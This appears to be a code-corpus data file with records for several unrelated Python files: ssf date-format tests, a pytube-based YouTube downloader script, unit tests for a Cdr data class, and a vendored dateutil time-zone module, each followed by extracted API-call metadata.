assert ssf.format('mmmmm mmm mmmm', '12/3/2020') == 'X DE DEC'
try:
ssf.set_month_names(2)
assert False # Failed
except ValueError:
pass
try:
ssf.set_month_names((0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12))
assert False # Failed
except ValueError:
pass
def test_get_load_table():
t = ssf.get_table()
assert t[0] == 'General'
assert t[1] == '0'
assert t[14] == 'm/d/yyyy'
assert t[49] == '@'
ssf.load_table({104:'yyyy-mm-dd', 105:'0.0'})
assert ssf.format(104, '10/6/2020') == '2020-10-06'
assert ssf.format(105, 3.4) == '3.4'
assert ssf.load('0') == 1
assert ssf.load('mmm mmmm') == 5 # Will be inserted at 5
assert ssf.load('@') == 49
assert ssf.format(5, '10/6/2020') == 'Oct October'
| [((2, 6, 2, 25), 'ssf.SSF', 'SSF', (), '', False, 'from ssf import SSF\n')] |
devppratik/Youtube-Downloader | script.py | ccdf31b83fbce2d05711c64dbad729c935c72b8a | import os
import pyfiglet
from pytube import YouTube, Playlist
file_size = 0
folder_name = ""
# Progress Bar
def print_progress_bar(iteration, total, prefix='', suffix='', decimals=1, length=100, fill='#', print_end="\r"):
percent = ("{0:." + str(decimals) + "f}").format(100 *
(iteration / float(total)))
filled_length = int(length * iteration // total)
bar = fill * filled_length + '-' * (length - filled_length)
print(f'\r{prefix} |{bar}| {percent}% {suffix}', end=print_end)
if iteration == total:
print()
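# Illustrative standalone use of print_progress_bar (not part of the original
# script; shown only to clarify the call signature and update pattern):
#
#   total_items = 20
#   for done in range(1, total_items + 1):
#       print_progress_bar(done, total_items, prefix='Progress:', suffix='Complete', length=50)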
# Show Progress Bar
def show_progress_bar(chunk, file_handle, bytes_remaining):
print_progress_bar(file_size - bytes_remaining, file_size, prefix='Progress:', suffix='Complete', length=50)
return
# Get Download Location
def get_download_location():
if os.name == 'nt':
download_location = os.path.join(os.path.expanduser('~'), 'Downloads')
else:
download_location = os.path.join(
os.path.expanduser('~'), 'Downloads')
return download_location
# Get Desired Resolution
def get_resolution(video_url):
yt_obj = YouTube(video_url, on_progress_callback=show_progress_bar)
filters = yt_obj.streams.filter(progressive=True, file_extension='mp4')
print("\nAvailable Resolutions -")
for num, res in enumerate(filters, start=1):
print("\t{}. {}".format(num, str(res.resolution)))
selected_res = int(input('Please enter desired resolution : '))
filters = filters[selected_res - 1]
return filters
# Single Video Download
def download_video():
global file_size
try:
video_url = input('Provide Video Download Link : ')
filters = get_resolution(video_url)
file_size = int(filters.filesize)
download_location = get_download_location()
print("\nDownloading {}".format(str(filters.title)))
filters.download(output_path=download_location)
print("Video Downloaded. Thanks for using!!\nYou can find the video here - {}".format(download_location))
except Exception as e:
print("Some Error occured. Exception message is : ", e)
# Playlist Single Video Download
def download_playlist_video(video_url, res):
global file_size
yt_obj = YouTube(video_url, on_progress_callback=show_progress_bar)
filters = yt_obj.streams.filter(progressive=True, file_extension='mp4', resolution=res).first()
    if not filters:
        filters = yt_obj.streams.filter(
            progressive=True, file_extension='mp4').first()
    file_size = int(filters.filesize)
print("\nDownloading {}".format(str(filters.title)))
download_location = get_download_location()
filters.download(output_path="{}/{}".format(download_location, folder_name))
print("Download Complete")
# Playlist Download
def download_playlist():
global folder_name
try:
playlist_url = input('Provide Playlist Link : ')
videos_list = Playlist(playlist_url)
folder_name = videos_list.title
resolution = get_resolution(videos_list[0]).resolution
for video in videos_list:
download_playlist_video(video, resolution)
print("All Videos Downloaded. Thanks for Using!!")
except Exception as e:
print("Some Error occurred. Exception message is : ", e)
# Main Function
def main():
ascii_banner = pyfiglet.figlet_format("YT Downloader")
print(ascii_banner)
print("\t By Pratik Panda\n\n")
choice = int(input(
"""MENU
1.Download Single Video
2.Download Playlist\n
Enter Your Choice : """))
if choice == 1:
download_video()
elif choice == 2:
download_playlist()
else:
print("Wrong Option")
# Start of Program
if __name__ == '__main__':
main()
| [((39, 13, 39, 71), 'pytube.YouTube', 'YouTube', (), '', False, 'from pytube import YouTube, Playlist\n'), ((67, 13, 67, 71), 'pytube.YouTube', 'YouTube', (), '', False, 'from pytube import YouTube, Playlist\n'), ((96, 19, 96, 58), 'pyfiglet.figlet_format', 'pyfiglet.figlet_format', ({(96, 42, 96, 57): '"""YT Downloader"""'}, {}), "('YT Downloader')", False, 'import pyfiglet\n'), ((84, 22, 84, 44), 'pytube.Playlist', 'Playlist', ({(84, 31, 84, 43): 'playlist_url'}, {}), '(playlist_url)', False, 'from pytube import YouTube, Playlist\n'), ((30, 41, 30, 64), 'os.path.expanduser', 'os.path.expanduser', ({(30, 60, 30, 63): '"""~"""'}, {}), "('~')", False, 'import os\n'), ((33, 12, 33, 35), 'os.path.expanduser', 'os.path.expanduser', ({(33, 31, 33, 34): '"""~"""'}, {}), "('~')", False, 'import os\n')] |
alex952/cdr | test/python/test.py | e8dce20c2cc635e5ad8bf16a16ec4f7d9a86ac16 | #
# Copyright 2014-2018 Neueda Ltd.
#
from cdr import Cdr
import unittest
field1 = 1
field2 = 2
field3 = 55
class TestCdr(unittest.TestCase):
def get_a_cdr(self):
d = Cdr()
d.setInteger(field1, 123)
d.setString(field2, "Hello")
d.setString(field3, "World")
return d
def test_set_integer(self):
d = self.get_a_cdr()
self.assertEqual(d.getInt32(field1), 123)
def test_set_string(self):
d = self.get_a_cdr()
d.setString(field2, "Hello")
self.assertEqual(d.getString(field2), "Hello")
def test_get_exception(self):
d = self.get_a_cdr()
with self.assertRaises(RuntimeError):
d.getInteger(4)
def test_to_string(self):
d = Cdr()
d.setInteger(field1, 123)
self.assertEqual(d.toString(), "1=123")
def test_str(self):
d = Cdr()
d.setInteger(field1, 123)
def test_nested(self):
d = Cdr()
e = Cdr()
e.setString(1, "hello")
e.setString(2, "world")
d.appendArray(1, e)
f = d.getArray(1)
self.assertEqual(e.getString(1), f[0].getString(1))
self.assertEqual(e.getString(2), f[0].getString(2))
def test_to_python_dict(self):
d = Cdr()
e = Cdr()
f = Cdr()
f[21] = 400
e[11] = 300
e[12] = [f]
d[1] = 100
d[2] = 200
d[3] = [e]
assert(d.toPythonDict()[3][0][12][0][21] == 400)
if __name__ == '__main__':
unittest.main()
| [((75, 4, 75, 19), 'unittest.main', 'unittest.main', ({}, {}), '()', False, 'import unittest\n'), ((16, 12, 16, 17), 'cdr.Cdr', 'Cdr', ({}, {}), '()', False, 'from cdr import Cdr\n'), ((38, 12, 38, 17), 'cdr.Cdr', 'Cdr', ({}, {}), '()', False, 'from cdr import Cdr\n'), ((43, 12, 43, 17), 'cdr.Cdr', 'Cdr', ({}, {}), '()', False, 'from cdr import Cdr\n'), ((47, 12, 47, 17), 'cdr.Cdr', 'Cdr', ({}, {}), '()', False, 'from cdr import Cdr\n'), ((48, 12, 48, 17), 'cdr.Cdr', 'Cdr', ({}, {}), '()', False, 'from cdr import Cdr\n'), ((58, 12, 58, 17), 'cdr.Cdr', 'Cdr', ({}, {}), '()', False, 'from cdr import Cdr\n'), ((59, 12, 59, 17), 'cdr.Cdr', 'Cdr', ({}, {}), '()', False, 'from cdr import Cdr\n'), ((60, 12, 60, 17), 'cdr.Cdr', 'Cdr', ({}, {}), '()', False, 'from cdr import Cdr\n')] |
klahnakoski/auth0-api | vendor/mo_times/vendor/dateutil/tz.py | eda9c2554c641da76687f64445b8d35543d012d9 | """
Copyright (c) 2003-2007 Gustavo Niemeyer <[email protected]>
This module offers extensions to the standard Python
datetime module.
"""
import datetime
import os
import struct
import sys
import time
from mo_future import PY3, string_types
__license__ = "Simplified BSD"
__all__ = ["tzutc", "tzoffset", "tzlocal", "tzfile", "tzrange",
"tzstr", "tzical", "tzwin", "tzwinlocal", "gettz"]
relativedelta = None
parser = None
rrule = None
try:
from dateutil.tzwin import tzwin, tzwinlocal
except (ImportError, OSError):
tzwin, tzwinlocal = None, None
def tzname_in_python2(myfunc):
"""Change unicode output into bytestrings in Python 2
tzname() API changed in Python 3. It used to return bytes, but was changed
to unicode strings
"""
def inner_func(*args, **kwargs):
if PY3:
return myfunc(*args, **kwargs)
else:
return myfunc(*args, **kwargs).encode()
return inner_func
ZERO = datetime.timedelta(0)
EPOCHORDINAL = datetime.datetime.utcfromtimestamp(0).toordinal()
class tzutc(datetime.tzinfo):
def utcoffset(self, dt):
return ZERO
def dst(self, dt):
return ZERO
@tzname_in_python2
def tzname(self, dt):
return "UTC"
def __eq__(self, other):
return (isinstance(other, tzutc) or
(isinstance(other, tzoffset) and other._offset == ZERO))
def __ne__(self, other):
return not self.__eq__(other)
def __repr__(self):
return "%s()" % self.__class__.__name__
__reduce__ = object.__reduce__
class tzoffset(datetime.tzinfo):
def __init__(self, name, offset):
self._name = name
self._offset = datetime.timedelta(seconds=offset)
def utcoffset(self, dt):
return self._offset
def dst(self, dt):
return ZERO
@tzname_in_python2
def tzname(self, dt):
return self._name
def __eq__(self, other):
return (isinstance(other, tzoffset) and
self._offset == other._offset)
def __ne__(self, other):
return not self.__eq__(other)
def __repr__(self):
return "%s(%s, %s)" % (self.__class__.__name__,
repr(self._name),
self._offset.days*86400+self._offset.seconds)
__reduce__ = object.__reduce__
class tzlocal(datetime.tzinfo):
_std_offset = datetime.timedelta(seconds=-time.timezone)
if time.daylight:
_dst_offset = datetime.timedelta(seconds=-time.altzone)
else:
_dst_offset = _std_offset
def utcoffset(self, dt):
if self._isdst(dt):
return self._dst_offset
else:
return self._std_offset
def dst(self, dt):
if self._isdst(dt):
return self._dst_offset-self._std_offset
else:
return ZERO
@tzname_in_python2
def tzname(self, dt):
return time.tzname[self._isdst(dt)]
def _isdst(self, dt):
# We can't use mktime here. It is unstable when deciding if
# the hour near to a change is DST or not.
#
# timestamp = time.mktime((dt.year, dt.month, dt.day, dt.hour,
# dt.minute, dt.second, dt.weekday(), 0, -1))
# return time.localtime(timestamp).tm_isdst
#
# The code above yields the following result:
#
#>>> import tz, datetime
#>>> t = tz.tzlocal()
#>>> datetime.datetime(2003,2,15,23,tzinfo=t).tzname()
#'BRDT'
#>>> datetime.datetime(2003,2,16,0,tzinfo=t).tzname()
#'BRST'
#>>> datetime.datetime(2003,2,15,23,tzinfo=t).tzname()
#'BRST'
#>>> datetime.datetime(2003,2,15,22,tzinfo=t).tzname()
#'BRDT'
#>>> datetime.datetime(2003,2,15,23,tzinfo=t).tzname()
#'BRDT'
#
# Here is a more stable implementation:
#
timestamp = ((dt.toordinal() - EPOCHORDINAL) * 86400
+ dt.hour * 3600
+ dt.minute * 60
+ dt.second)
return time.localtime(timestamp+time.timezone).tm_isdst
def __eq__(self, other):
if not isinstance(other, tzlocal):
return False
return (self._std_offset == other._std_offset and
self._dst_offset == other._dst_offset)
def __ne__(self, other):
return not self.__eq__(other)
def __repr__(self):
return "%s()" % self.__class__.__name__
__reduce__ = object.__reduce__
class _ttinfo(object):
__slots__ = ["offset", "delta", "isdst", "abbr", "isstd", "isgmt"]
def __init__(self):
for attr in self.__slots__:
setattr(self, attr, None)
def __repr__(self):
l = []
for attr in self.__slots__:
value = getattr(self, attr)
if value is not None:
l.append("%s=%s" % (attr, repr(value)))
return "%s(%s)" % (self.__class__.__name__, ", ".join(l))
def __eq__(self, other):
if not isinstance(other, _ttinfo):
return False
return (self.offset == other.offset and
self.delta == other.delta and
self.isdst == other.isdst and
self.abbr == other.abbr and
self.isstd == other.isstd and
self.isgmt == other.isgmt)
def __ne__(self, other):
return not self.__eq__(other)
def __getstate__(self):
state = {}
for name in self.__slots__:
state[name] = getattr(self, name, None)
return state
def __setstate__(self, state):
for name in self.__slots__:
if name in state:
setattr(self, name, state[name])
class tzfile(datetime.tzinfo):
# http://www.twinsun.com/tz/tz-link.htm
# ftp://ftp.iana.org/tz/tz*.tar.gz
def __init__(self, fileobj):
if isinstance(fileobj, string_types):
self._filename = fileobj
fileobj = open(fileobj, 'rb')
elif hasattr(fileobj, "name"):
self._filename = fileobj.name
else:
self._filename = repr(fileobj)
# From tzfile(5):
#
# The time zone information files used by tzset(3)
# begin with the magic characters "TZif" to identify
# them as time zone information files, followed by
# sixteen bytes reserved for future use, followed by
# six four-byte values of type long, written in a
# ``standard'' byte order (the high-order byte
# of the value is written first).
if fileobj.read(4).decode() != "TZif":
raise ValueError("magic not found")
fileobj.read(16)
(
# The number of UTC/local indicators stored in the file.
ttisgmtcnt,
# The number of standard/wall indicators stored in the file.
ttisstdcnt,
# The number of leap seconds for which data is
# stored in the file.
leapcnt,
# The number of "transition times" for which data
# is stored in the file.
timecnt,
# The number of "local time types" for which data
# is stored in the file (must not be zero).
typecnt,
# The number of characters of "time zone
# abbreviation strings" stored in the file.
charcnt,
) = struct.unpack(">6l", fileobj.read(24))
# The above header is followed by tzh_timecnt four-byte
# values of type long, sorted in ascending order.
# These values are written in ``standard'' byte order.
# Each is used as a transition time (as returned by
# time(2)) at which the rules for computing local time
# change.
if timecnt:
self._trans_list = struct.unpack(">%dl" % timecnt,
fileobj.read(timecnt*4))
else:
self._trans_list = []
# Next come tzh_timecnt one-byte values of type unsigned
# char; each one tells which of the different types of
# ``local time'' types described in the file is associated
# with the same-indexed transition time. These values
# serve as indices into an array of ttinfo structures that
# appears next in the file.
if timecnt:
self._trans_idx = struct.unpack(">%dB" % timecnt,
fileobj.read(timecnt))
else:
self._trans_idx = []
# Each ttinfo structure is written as a four-byte value
# for tt_gmtoff of type long, in a standard byte
# order, followed by a one-byte value for tt_isdst
# and a one-byte value for tt_abbrind. In each
# structure, tt_gmtoff gives the number of
# seconds to be added to UTC, tt_isdst tells whether
# tm_isdst should be set by localtime(3), and
# tt_abbrind serves as an index into the array of
# time zone abbreviation characters that follow the
# ttinfo structure(s) in the file.
ttinfo = []
for i in range(typecnt):
ttinfo.append(struct.unpack(">lbb", fileobj.read(6)))
abbr = fileobj.read(charcnt).decode()
# Then there are tzh_leapcnt pairs of four-byte
# values, written in standard byte order; the
# first value of each pair gives the time (as
# returned by time(2)) at which a leap second
# occurs; the second gives the total number of
# leap seconds to be applied after the given time.
# The pairs of values are sorted in ascending order
# by time.
# Not used, for now
if leapcnt:
leap = struct.unpack(">%dl" % (leapcnt*2),
fileobj.read(leapcnt*8))
# Then there are tzh_ttisstdcnt standard/wall
# indicators, each stored as a one-byte value;
# they tell whether the transition times associated
# with local time types were specified as standard
# time or wall clock time, and are used when
# a time zone file is used in handling POSIX-style
# time zone environment variables.
if ttisstdcnt:
isstd = struct.unpack(">%db" % ttisstdcnt,
fileobj.read(ttisstdcnt))
# Finally, there are tzh_ttisgmtcnt UTC/local
# indicators, each stored as a one-byte value;
# they tell whether the transition times associated
# with local time types were specified as UTC or
# local time, and are used when a time zone file
# is used in handling POSIX-style time zone envi-
# ronment variables.
if ttisgmtcnt:
isgmt = struct.unpack(">%db" % ttisgmtcnt,
fileobj.read(ttisgmtcnt))
# ** Everything has been read **
# Build ttinfo list
self._ttinfo_list = []
for i in range(typecnt):
gmtoff, isdst, abbrind = ttinfo[i]
# Round to full-minutes if that's not the case. Python's
# datetime doesn't accept sub-minute timezones. Check
# http://python.org/sf/1447945 for some information.
gmtoff = (gmtoff+30)//60*60
tti = _ttinfo()
tti.offset = gmtoff
tti.delta = datetime.timedelta(seconds=gmtoff)
tti.isdst = isdst
tti.abbr = abbr[abbrind:abbr.find('\x00', abbrind)]
tti.isstd = (ttisstdcnt > i and isstd[i] != 0)
tti.isgmt = (ttisgmtcnt > i and isgmt[i] != 0)
self._ttinfo_list.append(tti)
# Replace ttinfo indexes for ttinfo objects.
trans_idx = []
for idx in self._trans_idx:
trans_idx.append(self._ttinfo_list[idx])
self._trans_idx = tuple(trans_idx)
# Set standard, dst, and before ttinfos. before will be
# used when a given time is before any transitions,
# and will be set to the first non-dst ttinfo, or to
# the first dst, if all of them are dst.
self._ttinfo_std = None
self._ttinfo_dst = None
self._ttinfo_before = None
if self._ttinfo_list:
if not self._trans_list:
self._ttinfo_std = self._ttinfo_first = self._ttinfo_list[0]
else:
for i in range(timecnt-1, -1, -1):
tti = self._trans_idx[i]
if not self._ttinfo_std and not tti.isdst:
self._ttinfo_std = tti
elif not self._ttinfo_dst and tti.isdst:
self._ttinfo_dst = tti
if self._ttinfo_std and self._ttinfo_dst:
break
else:
if self._ttinfo_dst and not self._ttinfo_std:
self._ttinfo_std = self._ttinfo_dst
for tti in self._ttinfo_list:
if not tti.isdst:
self._ttinfo_before = tti
break
else:
self._ttinfo_before = self._ttinfo_list[0]
# Now fix transition times to become relative to wall time.
#
# I'm not sure about this. In my tests, the tz source file
# is setup to wall time, and in the binary file isstd and
# isgmt are off, so it should be in wall time. OTOH, it's
# always in gmt time. Let me know if you have comments
# about this.
laststdoffset = 0
self._trans_list = list(self._trans_list)
for i in range(len(self._trans_list)):
tti = self._trans_idx[i]
if not tti.isdst:
# This is std time.
self._trans_list[i] += tti.offset
laststdoffset = tti.offset
else:
# This is dst time. Convert to std.
self._trans_list[i] += laststdoffset
self._trans_list = tuple(self._trans_list)
def _find_ttinfo(self, dt, laststd=0):
timestamp = ((dt.toordinal() - EPOCHORDINAL) * 86400
+ dt.hour * 3600
+ dt.minute * 60
+ dt.second)
idx = 0
for trans in self._trans_list:
if timestamp < trans:
break
idx += 1
else:
return self._ttinfo_std
if idx == 0:
return self._ttinfo_before
if laststd:
while idx > 0:
tti = self._trans_idx[idx-1]
if not tti.isdst:
return tti
idx -= 1
else:
return self._ttinfo_std
else:
return self._trans_idx[idx-1]
def utcoffset(self, dt):
if not self._ttinfo_std:
return ZERO
return self._find_ttinfo(dt).delta
def dst(self, dt):
if not self._ttinfo_dst:
return ZERO
tti = self._find_ttinfo(dt)
if not tti.isdst:
return ZERO
# The documentation says that utcoffset()-dst() must
# be constant for every dt.
return tti.delta-self._find_ttinfo(dt, laststd=1).delta
# An alternative for that would be:
#
# return self._ttinfo_dst.offset-self._ttinfo_std.offset
#
# However, this class stores historical changes in the
        # dst offset, so I believe that this wouldn't be the right
# way to implement this.
@tzname_in_python2
def tzname(self, dt):
if not self._ttinfo_std:
return None
return self._find_ttinfo(dt).abbr
def __eq__(self, other):
if not isinstance(other, tzfile):
return False
return (self._trans_list == other._trans_list and
self._trans_idx == other._trans_idx and
self._ttinfo_list == other._ttinfo_list)
def __ne__(self, other):
return not self.__eq__(other)
def __repr__(self):
return "%s(%s)" % (self.__class__.__name__, repr(self._filename))
def __reduce__(self):
if not os.path.isfile(self._filename):
raise ValueError("Unpickable %s class" % self.__class__.__name__)
return (self.__class__, (self._filename,))
class tzrange(datetime.tzinfo):
def __init__(self, stdabbr, stdoffset=None,
dstabbr=None, dstoffset=None,
start=None, end=None):
global relativedelta
if not relativedelta:
from dateutil import relativedelta
self._std_abbr = stdabbr
self._dst_abbr = dstabbr
if stdoffset is not None:
self._std_offset = datetime.timedelta(seconds=stdoffset)
else:
self._std_offset = ZERO
if dstoffset is not None:
self._dst_offset = datetime.timedelta(seconds=dstoffset)
elif dstabbr and stdoffset is not None:
self._dst_offset = self._std_offset+datetime.timedelta(hours=+1)
else:
self._dst_offset = ZERO
if dstabbr and start is None:
self._start_delta = relativedelta.relativedelta(
hours=+2, month=4, day=1, weekday=relativedelta.SU(+1))
else:
self._start_delta = start
if dstabbr and end is None:
self._end_delta = relativedelta.relativedelta(
hours=+1, month=10, day=31, weekday=relativedelta.SU(-1))
else:
self._end_delta = end
def utcoffset(self, dt):
if self._isdst(dt):
return self._dst_offset
else:
return self._std_offset
def dst(self, dt):
if self._isdst(dt):
return self._dst_offset-self._std_offset
else:
return ZERO
@tzname_in_python2
def tzname(self, dt):
if self._isdst(dt):
return self._dst_abbr
else:
return self._std_abbr
def _isdst(self, dt):
if not self._start_delta:
return False
year = datetime.datetime(dt.year, 1, 1)
start = year+self._start_delta
end = year+self._end_delta
dt = dt.replace(tzinfo=None)
if start < end:
return dt >= start and dt < end
else:
return dt >= start or dt < end
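    # Note on _isdst above: when start < end the DST window lies inside one
    # calendar year (northern-hemisphere style rules) and a plain range check
    # applies; when start > end (e.g. an October-through-April rule) DST spans
    # the year boundary, so a date counts as DST on either side of the wrap.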
def __eq__(self, other):
if not isinstance(other, tzrange):
return False
return (self._std_abbr == other._std_abbr and
self._dst_abbr == other._dst_abbr and
self._std_offset == other._std_offset and
self._dst_offset == other._dst_offset and
self._start_delta == other._start_delta and
self._end_delta == other._end_delta)
def __ne__(self, other):
return not self.__eq__(other)
def __repr__(self):
return "%s(...)" % self.__class__.__name__
__reduce__ = object.__reduce__
class tzstr(tzrange):
def __init__(self, s):
global parser
if not parser:
from dateutil import parser
self._s = s
res = parser._parsetz(s)
if res is None:
raise ValueError("unknown string format")
# Here we break the compatibility with the TZ variable handling.
# GMT-3 actually *means* the timezone -3.
if res.stdabbr in ("GMT", "UTC"):
res.stdoffset *= -1
# We must initialize it first, since _delta() needs
# _std_offset and _dst_offset set. Use False in start/end
# to avoid building it two times.
tzrange.__init__(self, res.stdabbr, res.stdoffset,
res.dstabbr, res.dstoffset,
start=False, end=False)
if not res.dstabbr:
self._start_delta = None
self._end_delta = None
else:
self._start_delta = self._delta(res.start)
if self._start_delta:
self._end_delta = self._delta(res.end, isend=1)
def _delta(self, x, isend=0):
kwargs = {}
if x.month is not None:
kwargs["month"] = x.month
if x.weekday is not None:
kwargs["weekday"] = relativedelta.weekday(x.weekday, x.week)
if x.week > 0:
kwargs["day"] = 1
else:
kwargs["day"] = 31
elif x.day:
kwargs["day"] = x.day
elif x.yday is not None:
kwargs["yearday"] = x.yday
elif x.jyday is not None:
kwargs["nlyearday"] = x.jyday
if not kwargs:
# Default is to start on first sunday of april, and end
# on last sunday of october.
if not isend:
kwargs["month"] = 4
kwargs["day"] = 1
kwargs["weekday"] = relativedelta.SU(+1)
else:
kwargs["month"] = 10
kwargs["day"] = 31
kwargs["weekday"] = relativedelta.SU(-1)
if x.time is not None:
kwargs["seconds"] = x.time
else:
# Default is 2AM.
kwargs["seconds"] = 7200
if isend:
# Convert to standard time, to follow the documented way
# of working with the extra hour. See the documentation
# of the tzinfo class.
delta = self._dst_offset-self._std_offset
kwargs["seconds"] -= delta.seconds+delta.days*86400
return relativedelta.relativedelta(**kwargs)
def __repr__(self):
return "%s(%s)" % (self.__class__.__name__, repr(self._s))
class _tzicalvtzcomp(object):
def __init__(self, tzoffsetfrom, tzoffsetto, isdst,
tzname=None, rrule=None):
self.tzoffsetfrom = datetime.timedelta(seconds=tzoffsetfrom)
self.tzoffsetto = datetime.timedelta(seconds=tzoffsetto)
self.tzoffsetdiff = self.tzoffsetto-self.tzoffsetfrom
self.isdst = isdst
self.tzname = tzname
self.rrule = rrule
class _tzicalvtz(datetime.tzinfo):
def __init__(self, tzid, comps=[]):
self._tzid = tzid
self._comps = comps
self._cachedate = []
self._cachecomp = []
def _find_comp(self, dt):
if len(self._comps) == 1:
return self._comps[0]
dt = dt.replace(tzinfo=None)
try:
return self._cachecomp[self._cachedate.index(dt)]
except ValueError:
pass
lastcomp = None
lastcompdt = None
for comp in self._comps:
if not comp.isdst:
# Handle the extra hour in DST -> STD
compdt = comp.rrule.before(dt-comp.tzoffsetdiff, inc=True)
else:
compdt = comp.rrule.before(dt, inc=True)
if compdt and (not lastcompdt or lastcompdt < compdt):
lastcompdt = compdt
lastcomp = comp
if not lastcomp:
# RFC says nothing about what to do when a given
# time is before the first onset date. We'll look for the
# first standard component, or the first component, if
# none is found.
for comp in self._comps:
if not comp.isdst:
lastcomp = comp
break
else:
                lastcomp = self._comps[0]
self._cachedate.insert(0, dt)
self._cachecomp.insert(0, lastcomp)
if len(self._cachedate) > 10:
self._cachedate.pop()
self._cachecomp.pop()
return lastcomp
def utcoffset(self, dt):
return self._find_comp(dt).tzoffsetto
def dst(self, dt):
comp = self._find_comp(dt)
if comp.isdst:
return comp.tzoffsetdiff
else:
return ZERO
@tzname_in_python2
def tzname(self, dt):
return self._find_comp(dt).tzname
def __repr__(self):
return "<tzicalvtz %s>" % repr(self._tzid)
__reduce__ = object.__reduce__
class tzical(object):
def __init__(self, fileobj):
global rrule
if not rrule:
from dateutil import rrule
if isinstance(fileobj, string_types):
self._s = fileobj
fileobj = open(fileobj, 'r') # ical should be encoded in UTF-8 with CRLF
elif hasattr(fileobj, "name"):
self._s = fileobj.name
else:
self._s = repr(fileobj)
self._vtz = {}
self._parse_rfc(fileobj.read())
def keys(self):
return list(self._vtz.keys())
def get(self, tzid=None):
if tzid is None:
keys = list(self._vtz.keys())
if len(keys) == 0:
raise ValueError("no timezones defined")
elif len(keys) > 1:
raise ValueError("more than one timezone available")
tzid = keys[0]
return self._vtz.get(tzid)
def _parse_offset(self, s):
s = s.strip()
if not s:
raise ValueError("empty offset")
if s[0] in ('+', '-'):
signal = (-1, +1)[s[0]=='+']
s = s[1:]
else:
signal = +1
if len(s) == 4:
return (int(s[:2])*3600+int(s[2:])*60)*signal
elif len(s) == 6:
return (int(s[:2])*3600+int(s[2:4])*60+int(s[4:]))*signal
else:
raise ValueError("invalid offset: "+s)
def _parse_rfc(self, s):
lines = s.splitlines()
if not lines:
raise ValueError("empty string")
# Unfold
i = 0
while i < len(lines):
line = lines[i].rstrip()
if not line:
del lines[i]
elif i > 0 and line[0] == " ":
lines[i-1] += line[1:]
del lines[i]
else:
i += 1
tzid = None
comps = []
invtz = False
comptype = None
for line in lines:
if not line:
continue
name, value = line.split(':', 1)
parms = name.split(';')
if not parms:
raise ValueError("empty property name")
name = parms[0].upper()
parms = parms[1:]
if invtz:
if name == "BEGIN":
if value in ("STANDARD", "DAYLIGHT"):
# Process component
pass
else:
raise ValueError("unknown component: "+value)
comptype = value
founddtstart = False
tzoffsetfrom = None
tzoffsetto = None
rrulelines = []
tzname = None
elif name == "END":
if value == "VTIMEZONE":
if comptype:
raise ValueError("component not closed: "+comptype)
if not tzid:
raise ValueError("mandatory TZID not found")
if not comps:
raise ValueError("at least one component is needed")
# Process vtimezone
self._vtz[tzid] = _tzicalvtz(tzid, comps)
invtz = False
elif value == comptype:
if not founddtstart:
raise ValueError("mandatory DTSTART not found")
if tzoffsetfrom is None:
raise ValueError("mandatory TZOFFSETFROM not found")
if tzoffsetto is None:
raise ValueError("mandatory TZOFFSETFROM not found")
# Process component
rr = None
if rrulelines:
rr = rrule.rrulestr("\n".join(rrulelines),
compatible=True,
ignoretz=True,
cache=True)
comp = _tzicalvtzcomp(tzoffsetfrom, tzoffsetto,
(comptype == "DAYLIGHT"),
tzname, rr)
comps.append(comp)
comptype = None
else:
raise ValueError("invalid component end: "+value)
elif comptype:
if name == "DTSTART":
rrulelines.append(line)
founddtstart = True
elif name in ("RRULE", "RDATE", "EXRULE", "EXDATE"):
rrulelines.append(line)
elif name == "TZOFFSETFROM":
if parms:
raise ValueError("unsupported %s parm: %s "%(name, parms[0]))
tzoffsetfrom = self._parse_offset(value)
elif name == "TZOFFSETTO":
if parms:
raise ValueError("unsupported TZOFFSETTO parm: "+parms[0])
tzoffsetto = self._parse_offset(value)
elif name == "TZNAME":
if parms:
raise ValueError("unsupported TZNAME parm: "+parms[0])
tzname = value
elif name == "COMMENT":
pass
else:
raise ValueError("unsupported property: "+name)
else:
if name == "TZID":
if parms:
raise ValueError("unsupported TZID parm: "+parms[0])
tzid = value
elif name in ("TZURL", "LAST-MODIFIED", "COMMENT"):
pass
else:
raise ValueError("unsupported property: "+name)
elif name == "BEGIN" and value == "VTIMEZONE":
tzid = None
comps = []
invtz = True
def __repr__(self):
return "%s(%s)" % (self.__class__.__name__, repr(self._s))
if sys.platform != "win32":
TZFILES = ["/etc/localtime", "localtime"]
TZPATHS = ["/usr/share/zoneinfo", "/usr/lib/zoneinfo", "/etc/zoneinfo"]
else:
TZFILES = []
TZPATHS = []
def gettz(name=None):
tz = None
if not name:
try:
name = os.environ["TZ"]
except KeyError:
pass
if name is None or name == ":":
for filepath in TZFILES:
if not os.path.isabs(filepath):
filename = filepath
for path in TZPATHS:
filepath = os.path.join(path, filename)
if os.path.isfile(filepath):
break
else:
continue
if os.path.isfile(filepath):
try:
tz = tzfile(filepath)
break
except (IOError, OSError, ValueError):
pass
else:
tz = tzlocal()
else:
if name.startswith(":"):
            name = name[1:]  # strip the leading ":" prefix
if os.path.isabs(name):
if os.path.isfile(name):
tz = tzfile(name)
else:
tz = None
else:
for path in TZPATHS:
filepath = os.path.join(path, name)
if not os.path.isfile(filepath):
filepath = filepath.replace(' ', '_')
if not os.path.isfile(filepath):
continue
try:
tz = tzfile(filepath)
break
except (IOError, OSError, ValueError):
pass
else:
tz = None
if tzwin:
try:
tz = tzwin(name)
except OSError:
pass
if not tz:
from dateutil.zoneinfo import gettz
tz = gettz(name)
if not tz:
for c in name:
# name must have at least one offset to be a tzstr
if c in "0123456789":
try:
tz = tzstr(name)
except ValueError:
pass
break
else:
if name in ("GMT", "UTC"):
tz = tzutc()
elif name in time.tzname:
tz = tzlocal()
return tz
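# Illustrative uses of gettz() (a sketch only; results depend on the local
# zoneinfo install and the TZ environment variable):
#
#   gettz()                          # TZ env var, else /etc/localtime, else tzlocal()
#   gettz("America/New_York")        # looked up under TZPATHS and returned as a tzfile
#   gettz("UTC")                     # falls back to tzutc() if no zoneinfo file is found
#   gettz("EST5EDT,M4.1.0,M10.5.0")  # if no matching file exists, the digits make it parse as a tzstr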
# vim:ts=4:sw=4:et
